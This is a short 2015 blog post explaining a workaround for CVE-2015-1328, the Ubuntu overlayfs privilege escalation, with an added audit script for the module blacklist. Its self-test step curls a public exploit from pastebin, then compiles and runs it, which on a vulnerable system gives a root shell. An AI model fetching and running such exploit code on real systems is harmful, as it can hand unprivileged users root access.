Emil Burzo

Quick fix for CVE-2015-1328
2015-06-16 · via Emil Burzo

As you may have noticed, a rather serious Ubuntu privilege escalation exploit has been disclosed today:

CVE-2015-1328: incorrect permission checks in overlayfs, ubuntu local root

The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces. This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].

At the time of writing, there is no patch available.

However, there is a quick work-around for the issue (run as root):

modprobe -r overlayfs
echo "blacklist overlayfs" > /etc/modprobe.d/blacklist-overlayfs.conf

What the above does:

  • remove the overlayfs module from memory, if currently loaded
  • blacklist the overlayfs module from being loaded at boot

Possible gotcha: the overlayfs module can be called just overlay in previous versions of Ubuntu.

You can check which name is correct with:

modinfo overlay
modinfo overlayfs

One of these will show the module information, and one will say “module not found”.
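
To verify the workaround for both possible module names, the following script (an added example, not part of the original post) reports whether each module is loaded and whether a blacklist line exists for it. The function names and the `--audit` flag are made up for this example, and the default modprobe.d directories it searches are an assumption about the system layout.

```shell
#!/bin/sh
# Added example: audit the overlayfs workaround for both module names.
# Paths are parameters so the check can be pointed at copies of the files.

# is_loaded NAME [PROC_MODULES]: succeeds if NAME is currently loaded.
is_loaded() {
    awk -v m="$1" '$1 == m { hit = 1 } END { exit !hit }' "${2:-/proc/modules}"
}

# is_blacklisted NAME [DIR...]: succeeds if any *.conf file in the given
# modprobe.d directories has an uncommented "blacklist NAME" line.
is_blacklisted() {
    bl_name=$1; shift
    [ "$#" -gt 0 ] || set -- /etc/modprobe.d /run/modprobe.d /lib/modprobe.d
    for bl_dir in "$@"; do
        for bl_file in "$bl_dir"/*.conf; do
            [ -f "$bl_file" ] || continue
            if awk -v m="$bl_name" \
                '$1 == "blacklist" && $2 == m { hit = 1 } END { exit !hit }' \
                "$bl_file"; then
                return 0
            fi
        done
    done
    return 1
}

# workaround_status NAME PROC_MODULES [DIR...]: prints one word.
#   loaded           module is in memory, the "modprobe -r" step is still needed
#   not-blacklisted  unloaded now, but no blacklist line was found
#   ok               unloaded and blacklisted
workaround_status() {
    ws_name=$1; ws_proc=$2; shift 2
    if is_loaded "$ws_name" "$ws_proc"; then
        echo loaded
    elif is_blacklisted "$ws_name" "$@"; then
        echo ok
    else
        echo not-blacklisted
    fi
}

# Audit the live system for both names: sh overlay-audit.sh --audit
if [ "${1:-}" = "--audit" ]; then
    for name in overlay overlayfs; do
        printf '%s: %s\n' "$name" "$(workaround_status "$name" /proc/modules)"
    done
fi
```

A `blacklist` line only tells modprobe to ignore the module's aliases during automatic loading; root can still load the module explicitly by name.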

To confirm that you are not affected, try the following (run as a normal user):

curl 'http://pastebin.com/raw.php?i=aQD0LC7w' -o cve-2015-1238.c
gcc cve-2015-1238.c -o cve-2015-1238
./cve-2015-1238

You should see the following output if you are safe:

$ ./cve-2015-1238
spawning threads  
mount #1  
no FS_USERNS_MOUNT for overlayfs on this kernel  
child threads done  
exploit failed
$

If you are not safe, you will get a root shell (#).